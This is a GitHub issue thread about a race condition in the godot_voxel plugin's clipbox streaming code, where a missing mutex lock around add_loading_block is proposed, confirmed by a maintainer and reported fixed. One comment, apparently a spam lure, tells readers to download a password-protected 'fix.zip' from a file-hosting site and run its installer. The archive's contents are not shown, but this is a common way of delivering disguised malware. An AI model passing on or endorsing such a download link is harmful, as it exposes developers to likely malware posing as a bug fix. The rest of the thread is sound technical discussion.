### ISSUE TITLE
Clipbox Streaming Access Critical Section Problem

### ISSUE THREAD

**Issue by lenesxy** [Zylann/godot_voxel#692]
When applicable, please describe your setup:
- Plugin version (or where you got it):https://github.com/Zylann/godot_voxel/archive/refs/tags/v1.3.0.zip
- Godot version:https://github.com/godotengine/godot/archive/refs/tags/4.3-stable.zip
- OS:Windows10
- Project:https://github.com/Zylann/solar_system_demo.git

* File:terrain\variable_lod\voxel_lod_terrain_update_clipbox_streaming.cpp
* Line:535
* Function:process_data_blocks_sliding_box()

Current:
```
534 {
535     ZN_PROFILE_SCOPE_NAMED("Add loading blocks");
536     for (const Vector3i bpos : tls_missing_blocks) {
537         add_loading_block(lod, bpos, lod_index, data_blocks_to_load);
538     }
539 }
```

Here add_loading_block() will access VoxelLodTerrainUpdateData::Lod::loading_blocks[critical section].
I think a lock needs to be added here at line 536:
```
534 {
535     ZN_PROFILE_SCOPE_NAMED("Add loading blocks");
536     MutexLock lock(lod.loading_blocks_mutex);
537     for (const Vector3i bpos : tls_missing_blocks) {
538         add_loading_block(lod, bpos, lod_index, data_blocks_to_load);
539     }
540 }
```

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MGilleronFJ** [comment]
Looks like it needs a mutex lock indeed. There are several areas that would need it:

https://github.com/Zylann/godot_voxel/blob/60007c4f017ec33856150d2fad79ccad24bd0290/terrain/variable_lod/voxel_lod_terrain_update_clipbox_streaming.cpp#L571

https://github.com/Zylann/godot_voxel/blob/60007c4f017ec33856150d2fad79ccad24bd0290/terrain/variable_lod/voxel_lod_terrain_update_clipbox_streaming.cpp#L602

**Comment by Zylann** [comment]
Should be fixed in 3a9775f6fc45f2475c8a9e487885859bc9abed99
